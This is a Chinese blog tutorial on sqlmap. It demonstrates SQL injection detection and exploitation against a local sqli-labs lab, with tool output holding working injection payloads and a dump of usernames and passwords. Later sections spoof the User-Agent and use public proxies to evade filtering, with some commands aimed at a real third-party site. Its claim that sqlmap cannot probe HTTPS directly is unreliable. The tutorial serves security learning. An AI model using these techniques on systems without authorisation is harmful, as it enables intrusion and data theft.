SQLMAP自动化探测SQL注入

1.1 SQLMAP介绍

1.1.1 sqlmap漏洞检测类型

  1. 基于布尔的盲注检测
  2. 基于时间的盲注检测
  3. 基于错误的检测
  4. 基于union联合查询的检测
  5. 基于堆叠查询的检测

1.2 SQLMAP使用

1.2.1 SQLMAP帮助

# sqlmap -h
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.5#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'

1.2.1.1 常用参数说明

  • -hh:显示高级设置帮助文档
  • -u:指定URL进行探测
  • -m:通过指定文件扫描多个地址
  • -r:指定HTTP请求文件,目标URL,sql注入点
  • -l:对burpsuite或者WebScarab日志文件中的目标进行探测
  • -b:获取数据库类型,检索DBMS(数据库管理系统)标识
  • –dbs:探测可用数据库名称
  • -D:指定数据库进行枚举表名称
  • –tables:探测表名称
  • -T:指定表进行枚举字段名称
  • –columns:探测字段名称
  • -C:指定字段进行数据获取
  • –dump:转出获取到的数据库信息
  • –users:探测数据用户名称
  • –password:枚举数据库的用户名的密码hash
  • –batch:使用默认配置进行探测,可以在探测过程中不使用交互式信息询问
  • –user-agent:指定User-Agent内容
  • –random-agent:随机生成User-Agent内容
  • –proxy:指定代理进行探测
  • –delay:指定探测间隔时间,单位为秒
  • –proxy-file:通过文件指定多个代理
  • –level:检测级别,取值(1-5) 默认情况下sqlmap会测试所有GET参数和POST参数,当level大于等于2时会测试cookie参数,当level大于等于3时会测试User-Agent和Referer,当level=5时会测试Host头
  • –current-db:获取当前数据库
  • –current-user:获取当前登录数据库用户
  • –tamper=space2comment,between:混淆脚本,用于绕过应用层过滤、IPS、WAF,用/**/替换空格字符,用between替换大于号>
  • –hex:有时候字符编码的问题可能导致数据丢失,可以使用hex函数来避免,dump非ASCII字符内容时将其编码为16进制形式,收到后解码还原
  • –drop-set-cookie:当服务器端cookie有更新,可以使用–drop-set-cookie放弃更新cookie
  • –time-sec:基于时间的注入检测相应延迟时间(默认5秒)
  • –file-read:读取远端系统文件到本地
  • –technique=TECH 使用指定的类型(BEUSTQ)进行探测,默认全部使用
    • B: Boolean-based blind (布尔盲注)
    • E: Error-based (报错注入)
    • U: Union query-based (联合查询注入)
    • S: Stacked queries (文件系统,操作系统,注册表相关注入)
    • T: Time-based blind (时间盲注)

注意:当使用sqlmap要读取目标系统上文件或对目标系统进行指令的操作,或者对读取目标系统注册表(windows) 的话需要使用S。

1.2.2 探测单一目标

1.2.2.1 执行探测

针对单个URL进行SQL注入探测,使用-u或者–url参数

# sqlmap -u http://192.168.10.159/sqli-labs/Less-1/?id=1

提示探测到后端数据库为MYSQL询问我们是否跳过对于其他数据库的测试,选择y跳过。

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

对于剩余的测试,您想要包括所有针对”MySQL”扩展提供的级别(1) 和风险(1) 值的测试吗?

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

探测到ID参数是脆弱的,提示我们是否需要测试其他项,选择y即可。

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y

1.2.2.2 探测结果

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4290=4290 AND 'Udod'='Udod

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5563 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(5563=5563,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NFrs'='NFrs

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2923 FROM (SELECT(SLEEP(5)))PexQ) AND 'PnAx'='PnAx

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3315' UNION ALL SELECT NULL,NULL,CONCAT(0x7170717071,0x7a4b49646f774f436f474e434a706647745a44676d536c4f764f4f6149615a716b487946726a6358,0x716b717071)-- -
---
[10:47:44] [INFO] the back-end DBMS is MySQL
[10:47:44] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
web server operating system: Linux CentOS 7
web application technology: PHP 5.4.16, Apache 2.4.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

1.2.3 探测多个目标

1.2.3.1 创建目标地址集合文件

# vim sqlmap.txt
http://192.168.10.159/sqli-labs/Less-1/?id=1
http://192.168.10.159/sqli-labs/Less-2/?id=1
http://192.168.10.159/sqli-labs/Less-3/?id=1

1.2.3.2 执行探测

# sqlmap -m sqlmap.txt --dbs --users --batch

1.2.3.3 探测结果

[13:45:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:45:46] [INFO] fetching database users
database management system users [6]:
[*] ''@'centos7-sqlilabs'
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'centos7-sqlilabs'
[*] 'root'@'localhost'

[13:45:46] [INFO] fetching database names
[13:45:46] [INFO] resumed: 'information_schema'
[13:45:46] [INFO] resumed: 'challenges'
[13:45:46] [INFO] resumed: 'mysql'
[13:45:46] [INFO] resumed: 'performance_schema'
[13:45:46] [INFO] resumed: 'security'
[13:45:46] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.4 从文件加载HTTP请求探测

1.2.4.1 使用burpsuite抓取cookie

登录成功后刷新页面获取带cookie的请求头

图片[1]|SQLMAP自动化探测SQL注入|leon的博客

1.2.4.2 制作cookie头文件

# vim cookie.txt
GET /sqli-labs/Less-20/index.php HTTP/1.1
Host: 192.168.10.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.159/sqli-labs/Less-20/
Connection: close
Cookie: uname=admin*
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

1.2.4.3 执行检测

# sqlmap -r cookie.txt --level 3 --batch –dbs

1.2.4.4 探测结果

[14:20:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:20:32] [INFO] fetching database names
[14:20:32] [INFO] retrieved: 'information_schema'
[14:20:32] [INFO] retrieved: 'challenges'
[14:20:32] [INFO] retrieved: 'mysql'
[14:20:32] [INFO] retrieved: 'performance_schema'
[14:20:32] [INFO] retrieved: 'security'
[14:20:32] [INFO] retrieved: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.5 从burpsuite日志记录进行探测

1.2.5.1 burpsuite开启日志记录

图片[2]|SQLMAP自动化探测SQL注入|leon的博客

1.2.5.2 浏览器访问路径让burpsuite产生日志

开启burpsuite的intercept,多访问几个地址,全部Forward

图片[3]|SQLMAP自动化探测SQL注入|leon的博客

查看日志内容:

# cat /home/pinming/Documents/burpsuite.txt
======================================================
2:57:15 PM  http://192.168.10.159:80
======================================================
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.10.159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=p4htta40u6nis7p003jb4ihcg5
Upgrade-Insecure-Requests: 1
......

1.2.5.3 执行探测

# sqlmap -l /home/pinming/Documents/burpsuite.txt --level 3 --dbs --batch

1.2.5.4 探测结果

[14:59:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:59:01] [INFO] fetching database names
[14:59:01] [INFO] resumed: 'information_schema'
[14:59:01] [INFO] resumed: 'challenges'
[14:59:01] [INFO] resumed: 'mysql'
[14:59:01] [INFO] resumed: 'performance_schema'
[14:59:01] [INFO] resumed: 'security'
[14:59:01] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.6 指定注入类型进行注入

1.2.6.1 指定使用布尔型探测

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --technique=B –batch

1.2.6.2 探测结果

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4290=4290 AND 'Udod'='Udod
---
[15:10:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

1.2.7 枚举数据库信息

1.2.7.1 获取数据库名称

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dbs
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

1.2.7.2 获取表名称

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

1.2.7.3 获取字段名称

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security -T users --columns
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables --columns
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

Database: security
Table: referers
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(3)       |
| ip_address | varchar(35)  |
| referer    | varchar(256) |
+------------+--------------+

Database: security
Table: uagents
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| id         | int(3)       |
| ip_address | varchar(35)  |
| uagent     | varchar(256) |
| username   | varchar(20)  |
+------------+--------------+

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email_id | varchar(30) |
| id       | int(3)      |
+----------+-------------+

1.2.7.4 获取字段数据

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dump -D security -T users -C "username,password"
Database: security
Table: users
[15 entries]
+------------+------------+
| username   | password   |
+------------+------------+
| Dumb       | Dumb       |
| Angelina   | I-kill-you |
| Dummy      | p@ssword   |
| secure     | crappy     |
| stupid     | stupidity  |
| superman   | genious    |
| batman     | mob!le     |
| admin      | 654321     |
| admin1     | admin1     |
| admin2     | admin2     |
| admin3     | admin3     |
| dhakkan    | dumbo      |
| admin4     | admin4     |
| admin'-- + | 123456     |
| root       | 123456     |
+------------+------------+

1.3 SQLMAP请求参数

1.3.1 默认参数

通过抓包可以得知SQLMAP的User-Agent为sqlmap/1.6.5#stable (https://sqlmap.org)

图片[4]|SQLMAP自动化探测SQL注入|leon的博客

SQLMAP的特征非常明显,网站管理员可以通过这些明显的特征对我们的访问进行过滤。

1.3.2 修改默认请求参数

1.3.2.1 指定User-Agent

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --batch

图片[5]|SQLMAP自动化探测SQL注入|leon的博客

通过–user-agent选项指定后可以发现User-Agent是我们所指定的伪造内容信息,从而可以绕过网站管理员过滤

1.3.2.2 随机修改User-Agent

# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --random-agent --batch

图片[6]|SQLMAP自动化探测SQL注入|leon的博客

1.3.3 使用代理进行探测

免费的代理地址https://www.kuaidaili.com/free/inha/

使用代理进行探测时,是不能够探测内网目标的,除非目标在公网也能够正常访问。

1.3.3.1 使用单一代理进行探测

# sqlmap -u "http://www.baidu.com" --proxy "http://202.55.5.209:8090" --delay="1" --random-agent –batch

1.3.3.2 使用多个代理地址进行探测

# vim proxy.txt
http://183.247.199.114:30001
http://183.247.211.50:30001
http://122.9.101.6:8888

# sqlmap -u "http://www.baidu.com" --proxy-file=/root/proxy.txt --delay="1" --random-agent --batch

1.3.3.3 HTTPS探测

由于SQLmap不支持https直接探测,所以可以开启本地burpsuite,通过本地代理进行探测:

# sqlmap -u "https://www.baidu.com" --proxy "http://127.0.0.1:8080" --delay="1" --random-agent --batch
<img class="aligncenter size-full wp-image-2336" src="https://blog.leonshadow.cn/wp-content/uploads/2022/08/sql65.png" alt="" width="1897" height="236" />

 

温馨提示:本文最后更新于2022-12-20 20:57:37,已超过483天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2329.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享